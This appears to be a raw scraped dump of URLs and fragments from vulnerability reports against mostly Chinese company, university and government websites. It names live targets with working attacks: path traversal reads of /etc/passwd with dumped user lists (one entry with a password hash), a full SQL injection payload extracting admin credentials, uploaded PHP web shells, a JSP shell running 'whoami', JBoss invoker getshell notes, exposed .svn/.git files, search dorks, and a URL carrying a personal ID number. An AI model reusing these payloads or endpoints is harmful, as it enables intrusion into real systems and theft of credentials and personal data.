http://www.panbaidu.net/source/include/cron/cron_todayviews_dailys.php http://117.79.80.15:8088/ http://117.79.80.15:18880 http://wiapi.hexun.com/search/fundnotice.php?code=001011&p=1&c=20 http://member.multigold.com.cn http://zzzs.gxzyjy.net:80/servlet/DownLoadAttachmentServlet?type=notice&fileId=163&serverfilename=../../../../../../../../etc/passwd http://szgl.net/sub09/news-detail.asp?id=10164 http://www.wfdpc.gov.cn http://203.93.109.54:8080/cqpt/index.action http://www.cqjt.gov.cn/ http://61.138.188.178/ http://www.isun3d.com/admin/upfile.php http://www.excelsz.com/admin/upfile.php http://www.ythkj.cn/admin/upfile.php http://www.xiliufu.com/admin/upfile.php http://www.uv-print.net/admin/upfile.php http://www.szyouyun.net/admin/upfile.php http://www.sunet-sz.com/admin/upfile.php http://www.teralinks.com/admin/upfile.php http://www.idiadem.com/admin/upfile.php http://www.xyintl.com/admin/upfile.php http://www.skilhunt.com/admin/upfile.php http://www.isun3d.com/upfile/201504020522488961.php http://www.excelsz.com/upfile/201505121915536504.php 
http://www.ythkj.cn/upfile/201505121916478712.php http://www.xiliufu.com/upfile/201505121117376368.php http://www.uv-print.net/upfile/201505121918223617.php http://www.szyouyun.net/upfile/201505121919086902.php http://www.sunet-sz.com/upfile/201505121919516808.php http://www.teralinks.com/upfile/201505120420317024.php http://www.idiadem.com/upfile/201505120421188597.php http://www.xyintl.com/upfile/201505121922216169.php http://www.skilhunt.com/upfile/201505120423116727.php http://etds.lib.ncku.edu.tw/etdservice/searching?query_word1=1&query_field1=keyword http://sf-express.mlpplus.gikoo.cn/ http://59.175.201.156/中交第二航务工程局有限公司办公系统 http://59.175.201.156/invoker/JMXInvokerServlet,部署war进行getshell http://oa.wuzhouair.com/ http://www.glsc.com.cn:80/glzq/broker/advisorQuery.jsp?advisorName=135791 https://www.glsc.com.cn/kh/page_wykh.dhtml?page_from=gfwz http://apk.angeeks.com/queryListByPN.do?packagename=air.com.tencent.qqpasture http://www.jjghj.gov.cn/jjghj/admin/login.php http://www.econews.cn/ http://211.162.68.72/invokers/JMXInvokerServlet,部署war进行getshell http://hb.zbglxt.com/Factory/AjaxGetCSDM.aspx?CSDM=TEST http://henan.zbglxt.com/Factory/AjaxGetCSDM.aspx?CSDM=TEST http://qh.zbglxt.com/Factory/AjaxGetCSDM.aspx?CSDM=TEST http://zbtj.hyedu.net.cn/Factory/AjaxGetCSDM.aspx?CSDM=TEST http://hainan.zbglxt.com/Factory/AjaxGetCSDM.aspx?CSDM=TEST http://tzgl.ynjy.cn//Factory/AjaxGetCSDM.aspx?CSDM=TEST http://passportm.linekong.com/epassport_mid/xmlRpcServerServlet http://mp.linekong.com http://tdl01.8864.com/lkcps/ http://passportm.linekong.com/epassport_mid/xmlRpcServerServlet http://b2b.10086.cn/b2b/main/listVendorNotice.html?noticeType=2 http://b2b.10086.cn/b2b/main/listVendorNoticeResult.html?noticeBean.noticeType=2 http://b2b.10086.cn/b2b/main/listVendorNotice.html?noticeType=2 http://salesorder.meitun.com:80/consignee/saveConsignee http://58.50.254.85/SZOA/login.jsp http://58.50.254.85/jmx-console/ http://58.50.254.85/invoker/JMXInvokerServlet http://www.lhdtxx.com/ 
http://yzcqxx.com/ http://www.tzby.net/ http://htzx.jbedu.net/ http://www.lhzzx.cn:8080/ http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd http://www.w3.org/1999/xhtml http://detail.51credit.com/javascript/jquery-1.4.2.min.js http://img.51credit.com/credit/images/DD_belatedPNG.js http://www.xiaozhu.com/findpwdbyphone http://www.xiaozhu.com/ajax.php?op=AJAX_CheckConfirmCode&mobile=18551813248&confirmcode=7690 http://blog.1905.com/.svn/entries www.scal.com.cn/invite2011/admin/Admin_Invite.aspx此为漏洞地址,通过 www.scal.com.cn/invite2011/可报名和查看后台 www.scal.com.cn/invite2011/admin/Admin_Invite.aspx此处泄漏大量敏感数据 http://www.scal.com.cn/invite2011/admin/Admin_Invite.aspx http://member.multigold.com.cn http://zqb.creditease.cn http://ma.263em.com/gainvideo!saveOrUpdate.action http://221.192.132.15 http://**.**.**/WebReport/login.html http://e.qufenqi.com http://my.yaolan.com FTP:58.213.141.190:21 http://hb.htsc.com.cn/favicon.ico/a.php http://lvyou.baidu.com/plan/ajax/getRecommendPlans?surl= http://180.166.7.94 http://www.flnet.com/ http://logistics.flnet.com/login.aspx https://github.com/jayxigua/tools/blob/39144ee8fc1e8ec7b6db3dacf04a0141ba407fb6/mail/src/main/java/chilkatsoft/ChilkatExample.java http://crm.qufenqi.com http://aq.gdca.gov.cn:80/ http://aq.gdca.gov.cnIWIN=119253558 http://weixin.17ugo.com/index.php/system/account_saveaccount.php http://weixin.17ugo.com http://hnxxlr.hnlmmarket.com/admin/index.php http://222.74.224.21/buyFlow.do?method=judgeUser&type=2 http://222.74.224.21 http://**.**.**/ android:name=".PushMsgReceiver android:name="com.yongche.component.groundhog.RECEIVED_MESSAGE com:8080/customize/nwc_755_newvexam/login/login.aspx http://2015.gzcdc.org.cn/news/downtxt.aspx?filename=../../news/downtxt.aspx http://2015.gzcdc.org.cn/news/downtxt.aspx?filename=../../news/downtxt.aspx.cs http://www.ie.tsinghua.edu.cn/alumni/index.php?key=&ty=211&newsorder=sendtime&StartPage= http://www.baic.gov.cn//zxbs/ 
http://movie.js118114.com/adminax/manage/orders/OrderEList.aspx http://movie.js118114.com/adminax/manage/orders/ http://movie.js118114.com/Cinemas/ inurl:contentmanager.do?method=view http://60.247.10.155:8001/cms/columnmanager.do?method=NewsCommonSearch&title=1&type=new www.cnstedu.cn/cms/columnmanager.do?method=NewsCommonSearch&title=1&type=new http://kxsz.gdec.net/cms/columnmanager.do?method=NewsCommonSearch&title=1&type=new http://www.cimuset.org//cms/columnmanager.do?method=NewsCommonSearch&title=1&type=new http://www.fdstmc.org.cn//cms/columnmanager.do?method=NewsCommonSearch&title=1&type=new http://www.chinaworldmall.cn//cms/columnmanager.do?method=NewsCommonSearch&title=1&type=new http://www.sqkpym.org.cn/cms/columnmanager.do?method=NewsCommonSearch&title=1&type=new http://60.247.10.155:8001/cms/columnmanager.do?method http://sqlmap.org http://60.247.10.155:8001/cms/columnmanager.do?method http://sqlmap.org http://eip.laiyifen.com/这个系统,但是登录框不是密码,要什么RSA码才能登录,试了上面的几个用户,都不能登录,而且通过之前的漏洞,我们是可以知道有OA系统的,但是OA系统在外网访问不了 site:eip.laiyifen.com来搜索一下 http://duoyunlai.baoogu.com/logisticFactSupplierGoods/toAddSupplierGoods.htm http://ss.263.net/SelfService/register/userRegister.action http://ecs.263.net/getContactGroupInfo?CONTACTS_GROUP_ID=23520&t=0.6552546233447352 http://ecs.263.net/queryContactInfo?ID=710815 http://ecs.263.net/delContact?CONTACTS_ID_LIST=710821 http://ecs.263.net/getContactGroupInfo?CONTACTS_GROUP_ID=23521&t=0.3077797630749748 http://erm-kbs.ruc.edu.cn/ext/Info.aspx?t=datatable118&id=1 http://erm-kbs.ruc.edu.cn/ext/Info.aspx?t=datatable118&id=1%27and%201=@@version-- campus.baidu.com/integral/excentity http://116.211.4.142 http://116.211.4.142:9000/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat%280x3C6162633E,group_concat%280x7C,userid,0x3a,pwd,0x7C%29,0x3C2F6162633E%29,5,6,7,8,9%20from%20%60%23@__admin%60%23%22 
http://nczfgjj.com/a/detail/2011-1-20/78.html https://stat.bilibili.tv/ http://202.110.193.50:9080/zdcl/ http://dgdz.cic.tsinghua.edu.cn/bbs/viewdoclist.jsp?groupid=000000034 http://122.225.112.179/mLoginAction.do http://115.239.232.35/mLoginAction.do http://122.225.112.179 http://58.210.126.195/ http://122.224.142.233/pub/index.do?sysCmd=loginOpt http://122.224.142.233/invoker/JMXInvokerServlet http://122.224.142.233/jmx-console/ http://973.typhoon.gov.cn/down.php?f=L2V0Yy9wYXNzd2Q= http://973.typhoon.gov.cn/down.php?f=L2V0Yy9wYXNzd2Q= root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/mega/ftp/ftp/pub/:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network user:/var/crash:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www/html:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/www/usage:/sbin/nologin xfs:x:43:43:X 
Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin htt:x:100:101:IIIMF Htt:/usr/lib/im:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash named:x:25:25:Named:/var/named:/bin/bash ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false temp:x:65530:65530:Remote User:/tmp:/etc/telnet.remote webadm:x:49:100::/array:/sbin/nologin cactiuser:x:516:100::/tmp:/bin/bash guest:x:518:518::/ftp/guest:/sbin/nologin tfjj:x:520:521::/array/ftp/tfjj:/sbin/nologin wave:x:519:520::/array/wave/:/sbin/nologin wave1:x:519:520::/array/wave_ftp/:/sbin/nologin mvip:x:521:520::/array/wavevip:/sbin/nologin mhvip:x:521:520::/array/wavevip:/sbin/nologin vip:x:522:520::/array/wavevip:/sbin/nologin uploader:x:523:50::/array/ftp/downloader:/sbin/nologin downloader:x:524:50::/array/ftp/downloader:/sbin/nologin jhah:x:527:528::/array/ftp/jhyb:/sbin/nologin jhjx:x:528:528::/array/ftp/jhyb:/sbin/nologin jhsh:x:529:528::/array/ftp/jhyb:/sbin/nologin jhzj:MQSX8u3OXu6nA:530:528::/array/ftp/jhyb:/sbin/nologin jhsd:x:531:528::/array/ftp/jhyb:/sbin/nologin jhjs:x:531:528::/array/ftp/jhyb:/sbin/nologin jhfj:x:531:528::/array/ftp/jhyb:/sbin/nologin huangw:x:525:526::/array/users/huangw:/sbin/nologin baode:x:14:50::/mega/ftp/ftp/pub/baode:/sbin/nologin yangqz:x:533:533::/array/ftp/yangqz:/sbin/nologin yangk:x:534:100::/array/ftp/yangk:/sbin/nologin bailn:x:534:100::/array/ftp/bailn:/sbin/nologin yuhui:x:535:48::/array/ftp/yuhui:/sbin/nologin yangyh:x:539:539::/home/yangyh:/sbin/nologin wangxf:x:65534:65534::/array/users/wangxf:/sbin/nologin baoxw:x:65534:65534::/array/users/baoxw:/sbin/nologin tangj:x:1023:99::/array/users/tangj:/sbin/nologin tany:x:1025:50::/home/tany:/sbin/nologin grapestcm:x:1024:1029::/home/grapes_tcm:/sbin/nologin grapes:x:1026:1029::/home/grapes_tcm:/sbin/nologin yuh:x:535:48::/array/pictures/cloud/fcst:/sbin/nologin cloud:x:48:48::/array/pictures/cloud/fy2:/sbin/nologin ldm:x:536:536::/home/ldm:/bin/bash tigge:x:538:538::/home/tigge:/sbin/nologin 
tfs973:x:541:100::/array/973.typhoon.gov.cn:/sbin/nologin yingm:x:544:100::/array/pictures/cloud:/sbin/nologin chenpy:x:48:48::/array/pictures/rain/fy2c:/sbin/nologin tlfdp:x:48:48::/array/tlfdp.typhoon.gov.cn:/sbin/nologin nagios:x:545:546::/usr/local/nagios:/bin/bash expertteam:x:1021:1021::/array/vsftpuser/expertteam:/sbin/nologin gfsdata:x:1022:1028::/home/gfsdata:/sbin/nologin yiny:x:1027:100::/home/yiny:/bin/bash zhoux:x:1028:50::/mega/ftp/ftp/pub/WMO:/sbin/nologin data:x:1029:1031::/mega/data:/sbin/nologin test1:x:1029:1032::/mega/ftp/ftp/users/test1:/sbin/nologin http://973.typhoon.gov.cn/down.php?f=L2V0Yy9ob3N0cw== http://973.typhoon.gov.cn/down.php?f=L2V0Yy9pc3N1ZQ== http://pjmini.chanjet.com、正面拿不下来,于是旁注了下。 http://udp.ufida.com.cn/utilityOnline.asp http://oa.uoh.edu.cn/userLogin.action http://www.wooyun.org/bugs/wooyun-2010-0111053/trace/08fc5b92c865984154cbf23a9f250316 http://www.bjprd.com.cn/ http://jfx.nju.edu.cn/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://202.118.31.223:801/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://210.40.208.4/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://210.40.208.4/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://210.27.80.81/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://202.113.128.61/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://202.38.194.243/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://202.119.206.110/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://202.116.160.99/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://218.6.165.33/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://www2.hnit.edu.cn/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://202.205.93.151/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://210.30.190.86/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://59.69.128.134/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://210.45.192.18/sbweb/nameedit.asp?table=bbs&id=1&action=edit 
http://kysbc.cup.edu.cn/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://www.bjprd.com.cn:88/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://www.qzygz.com:8091/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://amd.hzu.edu.cn/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://125.223.223.15/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://202.201.152.152/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://202.118.31.223:801/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://www.qzygz.com:8091/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://202.113.128.61/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://222.242.198.102:88/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://202.114.242.120/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://202.197.61.13/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://202.119.206.110/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://202.198.129.102/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://219.244.71.48/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://gzc.cqnu.edu.cn/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://115.24.160.240/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://202.205.93.151/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://210.30.190.86/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://218.194.177.36/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://210.28.80.170/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://www.bjprd.com.cn:88/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://222.24.19.99/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://202.115.80.155/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://210.37.0.70/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://202.113.128.61/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://210.27.80.81/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://202.197.61.13/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://202.119.206.110/dzpweb/nameedit.asp?table=bbs&id=1&action=edit 
http://210.45.215.133/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://210.29.224.35/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://202.192.18.120/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://210.37.0.70/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://218.194.177.36/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://210.30.190.86/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://210.28.80.170/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://119.1.195.23:8282/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://222.24.19.99/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://gzc.cumt.edu.cn/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://202.201.152.152/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://202.113.128.61/tsweb/nameedit.asp?table=bbs&id=1&action=edit http://202.197.61.13/tsweb/nameedit.asp?table=bbs&id=1&action=edit http://202.119.206.110/tsweb/nameedit.asp?table=bbs&id=1&action=edit http://59.67.78.170:81/tsweb/nameedit.asp?table=bbs&id=1&action=edit http://gzc.cumt.edu.cn/tsweb/nameedit.asp?table=bbs&id=1&action=edit http://www.bjprd.com.cn/tsweb/nameedit.asp?table=bbs&id=1&action=edit http://www.trmc.aec.gov.tw/utf8/big5/keyword.php?KID=14 php://input php://input root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin 
pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin xueyanchao:x:500:500::/home/xueyanchao:/bin/bash yangyang:x:501:500::/home/yangyang:/bin/bash liujicheng:x:502:500::/home/liujicheng:/bin/bash kankaijun:x:503:500::/home/kankaijun:/bin/bash wangfei:x:505:500::/home/wangfei:/bin/bash yutao:x:506:500::/home/yutao:/bin/bash zhousihai:x:507:500::/home/zhousihai:/bin/bash fukezhi:x:508:500::/home/fukezhi:/bin/bash liwei:x:509:500::/home/liwei:/bin/bash rongwei:x:510:500::/home/rongwei:/bin/bash mysql:x:511:501::/home/mysql:/bin/bash hjs:x:504:500::/home/hjs:/bin/bash http://mail.sina.net/login http://wcp.sina.com/ http://ss.263.net/SelfService/password/doResetPassword.action jfile.cn/test.aspx http://buy.hujiang.com/ SQL:update http://abroad.nenu.edu.cn http://bec.nenu.edu.cn http://business.nenu.edu.cn http://hjxy.nenu.edu.cn http://pe.nenu.edu.cn http://rsc.nenu.edu.cn http://tzb.nenu.edu.cn http://zhaopin.nenu.edu.cn偶然机会发现东北师大人事处网站被篡改: http://rsc.nenu.edu.cn/html/ http://abroad.nenu.edu.cn/ admin:admin) http://abroad.nenu.edu.cn/admin/ http://www.hp1997.com http://www.hp1997.com/MyCenter/forgetpassUp.aspx http://222.221.18.137:8080/portal/login.jsp 
http://222.221.18.137:8080/zecmd/zecmd.jsp?comment=whoami http://m.dfyl-luxgen.com/fengmang/index.aspx?cityName=%E6%9D%AD%E5%B7%9E http://cloud.culture.tw/frontsite/opendata/openCmsAction.do?method=goCMSList&menuId=10201 https://who.is/whois/cloud.culture.tw http://cloud.culture.tw/frontsite/trans/emapOpenDataAction.do?method=exportEmapJson&typeId=K&ndctype=JSON&ndcnid=6222 http://www.wcfxb.net/ http://ldfxb.com/ http://61.153.79.222:3050/ http://183.129.136.54:3050/ http://220.162.195.162:3505/ http://publicworks.tainan.gov.tw/sub_proj/park_dataHandler.ashx?area=1 http://www.cybp2c.com/borrow/detail/id/11 http://www.cybp2c.com/borrow/detail?id=11 http://hi.xxt.cn/album/aview.do?aid=22131 http://www.mojing.cn/actions/.svn/entries http://img.mojing.cn/actions/.svn/entries http://pay.mojing.cn/action/.svn/entries http://pay.mojing.cn/web/.svn/entries inurl:showDetail.jsp?info_id= http://www.mlfy.gov.cn/sfpt/channel/showDetail.jsp?info_id=201309000467 sys.sdems.com/upfiles/ sys.sdems.com/upfiles/UPImage/ sys.sdems.com/images/ sys.sdems.com/bin/ sys.sdems.com/fckeditor/ sys.sdems.com/template/ sys.sdems.com/css/ sys.sdems.com/scripts/ http://61.128.123.168/sys/main.action,如图所示: http://wooyun.org/bugs/wooyun-2015-0113942/trace/12dcf13f84ed5047f384d9566441c556 inurl:ShowChannel.jsp?sys= http://www.fyfyssf.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0 http://210.34.213.107/default2.aspx http://210.34.213.105/default2.aspx http://210.34.213.88/default2.aspx http://210.34.213.107//fckeditor/editor/filemanager/browser/default/browser.html?&connector=../../connectors/aspx/connector.aspx http://210.34.213.88//fckeditor/editor/filemanager/browser/default/browser.html?&connector=../../connectors/aspx/connector.aspx http://210.34.213.105//fckeditor/editor/filemanager/browser/default/browser.html?&connector=../../connectors/aspx/connector.aspx http://www.rongdaqhd.com/soft/product.html http://60.213.186.122:81//www/seach.php?cat2id=8 
http://221.193.194.131/www/seach.php?cat2id=8 http://60.10.25.13/www/seach.php?cat2id=8 http://zxzj.cangzhou.gov.cn/www/seach.php?cat2id=8 http://www.qhdzxzj.gov.cn/www/seach.php?cat2id=8 http://www.bdzxzj.gov.cn/www/seach.php?cat2id=8 http://120.197.24.136:8080/verify/login http://www.linekong.com/special/dizhen/article.php?article_id=1860 http://cdc.uibe.edu.cn/user/LoginAdmin.aspx http://lsq.playcrab.com/.git/config http://as.playcrab.com/.git/config http://gm.playcrab.com/.git/config http://222.41.148.203:8989/tietongyunwei/tietongyunwei-debug/tietongyunwei.html https://xsp.95306.cn:443/page.asp?id=-1 http://icme.zju.edu.cn/cimsks/login.action?error=true http://202.204.112.26:9092/urp-common/urp-cas.jsp http://wenda.hexun.com/question/57074.html http://wooyun.org/bugs/wooyun-2015-0113971/trace/1b3dd51db349fd504bcb37b90db8ba77 http://www.fyfyssf.gov.cn/sfpt/FORM/SF_ZXZX/SelectList.jsp http://14.204.75.26/general/ http://www.exploit-db.com/exploits/19525/ http://global.m6go.com http://182.151.210.198:8080/login.jsp http://www.niuhuhu.com/user/login http://z.yirendai.com/sell/user_login http://z.yirendai.com/sell/ http://pic.2345.com/huodong/age/?home http://218.28.193.149/Aids/Login.htm?returnUrl=%2FAids%2FIndex.do http://218.28.193.149/webhiv/page/system/yhqx/userlogin_new.jsp http://218.28.193.149/webhiv/servlet/servletda?commandType=get&cssl=4&cslist=1&cslist=10&cslist=a.id||%27@%27||a.xb,&cslist=%20a.xm%20like%20%27-bfh-1-bfh-%27%20and%20a.bbbh%20like%20%27-bfh-1-bfh-%27%20and%20a.jcjg%20=%20%270501%27%20and%20a.id%20!=%271%27&time=115513181436 http://career-elite.huawei.com/CS/question.html http://career-elite.huawei.com/CS/teaminfo.html http://www.citictelint.com/sc/culture-gallery.php?id=25 http://eelab.tsinghua.edu.cn/bbs/forum.php?fid=763&type=1 http://api.51yund.com/sport/get_user_info https://**.**.**/por/login_psw.csp https://www.zzwms.com/news/info/id/5134.html https://www.zzwms.com/news/info?id=5134或者直接加个*也行 http://broker2.esf.leju.com/ 
http://broker2.esf.leju.com http://broker2.esf.leju.com/statnew/agentreal http://demos.jh0101.com/goa/Jhsoft.Web.login/NewView.aspx?ID=1018 http://xncfzyjy.scau.edu.cn/index.action http://broker2.esf.leju.com/ http://broker2.esf.leju.com/statnew/companycommunity?page_size=30&block=%CC%D5%C8%BB%CD%A4 http://jidian.njfu.edu.cn/newsshow.php?cid=4&id=584 http://whyl.gov.cn/display_temp/read.php?GovAffPub=1&TopicCode=1003 http://maths.cumt.edu.cn/math/admin/admin!login.action http://t3online.chanjet.com/yyexam/ http://t3online.chanjet.com/yyexam/jsp/sm/login!truelogin http://t3online.chanjet.com/yyexam/bak.jsp http://wooyun.org/bugs/wooyun-2010-0112901 about:reader javascript://协议的代码。 http://wutongyu.info/iff.xml http://www.hereice.com/ http://14.146.224.121/systemmgr/syshelp!loadHelpFile.jspx?filename=user_manual.rar http://14.146.224.121/login.jspx http://www.xiangyahui.com/dhadmin http://www.xiangyahui.com/upload/xyh/img/20150514/14315806401032.php http://subscribe.chinadaily.com.cn https://114.80.235.168 http://125.88.109.71/login.jspx,这是一个存放历史数据的平台 http://14.146.224.121/login.jspx http://kf.bianfeng.com/.git/config http://www.jlsjj.gov.cn/page/zdxx.aspx http://www.jlsjj.gov.cn/page/ShowData.aspx?id=0&mc=%e6%94%af%e9%98%9f%e7%ae%80%e4%bb%8b&tableName=endna196ZGpq https://github.com/qxiong133/tools/blob/9995c9fe51b1bd9786bbda41a68de8198a107754/baidu_data_code/lbs_stat_log_monitor/conf/db.ini https://github.com/qxiong133/tools/blob/9995c9fe51b1bd9786bbda41a68de8198a107754/baidu_data_code/lbs_stat_log_monitor/tools/logging_db_enter.sh http://219.141.185.30/wk.htm http://219.141.185.30/webroot.rar http://ceping.bangcle.com http://online.suning.com/console/ http://www.jx.10086.cn/xcdx/web/12.jsp http://eshop.chinadaily.com.cn/ http://e.huanqiu.com https://61.167.137.138/.svn/entries https://1.190.175.50/.svn/entries https://110.249.221.34/.svn/entries https://1.189.137.210/.svn/entries https://1.189.137.242/.svn/entries https://60.219.165.218/.svn/entries 
https://1.62.100.50/.svn/entries https://1.189.137.234/.svn/entries www.10jqka.com.cn/baike1/采用HDWiki,而这套系统存在注入。 www.10jqka.com.cn/baike1/index.php?edition-compare-1 https://219.156.146.15/login.html https://219.156.146.15 site:chaxun.neea.edu.cn inurl:examcenter/report.cn http://chaxun.neea.edu.cn/examcenter/report.cn?name=%D5%C5%E7%F7&op=doGetCont&selectbkjb=4&selectprovince=37&selectsub=280&selectyear=1200&sfzh=37030219900222212X&state=0&zkzh= grouprun.51yund.com/grouprun/person_challenge_record?user_id=1309706 grouprun.51yund.com/claimed?group_run_id=7382&user_id=1309706&member_id=1309706&is_share=&v=2.5.0 1.feed.51yund.com/feed/feedFlowV2?feed_type=nearby&user_id=1527479&v=2.5.0 http://feed.51yund.com/feed/feedFlowV2?feed_type=friends&user_id=1244698&v=2.5.0 http://feed.51yund.com http://125.46.106.44/BaseSiteSys/login.action http://www.hnew.com.cn/Complaint.aspx http://218.28.33.84:70/ajax/GetInfoByYCY.ashx http://218.28.33.84:70/ http://218.28.33.84:9090/manage/MainForm.aspx http://218.28.33.84:9090/userfiles/bak.aspx http://www.duimian.cn:8081/giftList.php?catid=6 http://ks.cqwsrc.com/Everyone/OpenPrintTicketView.aspx?applyId=16196 https://61.178.184.30/ https://61.178.184.31/ http://220.167.144.182/ https://118.122.80.190/ http://202.103.214.170:8888/ https://222.86.132.39/ https://61.188.185.134/ https://125.72.187.158/ https://61.178.144.21/ http://118.122.80.201:8088/ http://dealer.easypass.cn/ http://www.qiche4s.cn/ http://www.qiche4s.cn/100074170/contact.html http://www.tuniu.cn/bizConfirm/snapshot/2015-03-25/orderConfirm_orderId-4922294_1427258964436.html http://www.tuniu.cn/bizConfirm/snapshot/2015-04-21/orderConfirm_orderId-5137384_1429582439629.html http://taocan.ctrip.com/VacationBooking/Order.aspx?TmpOrderid=a2bnzt2uP%2fPineHcQMS%2bpg%3d%3d 